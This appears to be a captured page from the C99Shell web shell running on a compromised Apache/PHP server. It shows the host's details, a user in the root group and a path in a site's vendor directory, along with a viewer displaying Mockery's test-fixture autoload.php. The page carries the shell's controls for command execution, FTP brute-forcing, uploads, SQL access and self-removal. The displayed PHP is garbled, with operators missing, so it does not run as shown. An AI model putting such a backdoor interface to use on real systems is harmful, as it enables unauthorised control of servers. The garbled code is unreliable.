!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/mockery/mockery/fixtures/   drwxr-xr-x
Free 28.6 GB of 117.98 GB (24.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     autoload.php (1.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

if (!
function_exists('recursiveGlob')) {
    function 
globRecursively($pattern)
    {
        
$files glob($pattern) ?: [];
        foreach (
glob(dirname($pattern) . '/*'GLOB_ONLYDIR GLOB_NOSORT) ?: [] as $dir) {
            
$files array_merge($filesglobRecursively($dir '/' basename($pattern)));
        }
        return 
$files;
    }
}

// Autoload test fixtures for supported PHP versions (current and previous)

$phpVersions = [
    
'PHP83' => 80300,
    
'PHP82' => 80200,
    
'PHP81' => 80100,
    
'PHP80' => 80000,
    
'PHP74' => 70400,
    
'PHP73' => 70300,
    
'PHP72' => 70200,
];

$allVersions implode('|'array_keys($phpVersions));

$currentSupportedVersion implode('|'array_keys(array_filter($phpVersions, static function (int $version): bool {
    return 
PHP_VERSION_ID >= $version;
})));

$allTestsAndFixtures globRecursively(dirname(__DIR__) . '/fixtures/*.php');

$currentSupportedVersionTestsAndFixtures array_filter(
    
$allTestsAndFixtures,
    static function (
string $filePath) use ($currentSupportedVersion): bool {
        return 
preg_match('#' $currentSupportedVersion '#'$filePath) === 1;
    }
);

$allPhpVersionTestsAndFixtures array_filter(
    
$allTestsAndFixtures,
    static function (
string $filePath) use ($allVersions): bool {
        return 
preg_match('#' $allVersions '#'$filePath) === 1;
    }
);

$excludedPhpVersions array_diff($allPhpVersionTestsAndFixtures$currentSupportedVersionTestsAndFixtures);

$autoloadTestsAndFixtures array_diff($allTestsAndFixtures$excludedPhpVersions);

array_map(
    static function (
string $file): void {
        if (!
file_exists($file)) {
            return;
        }

        require_once 
$file;
    },
    
$autoloadTestsAndFixtures
);

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--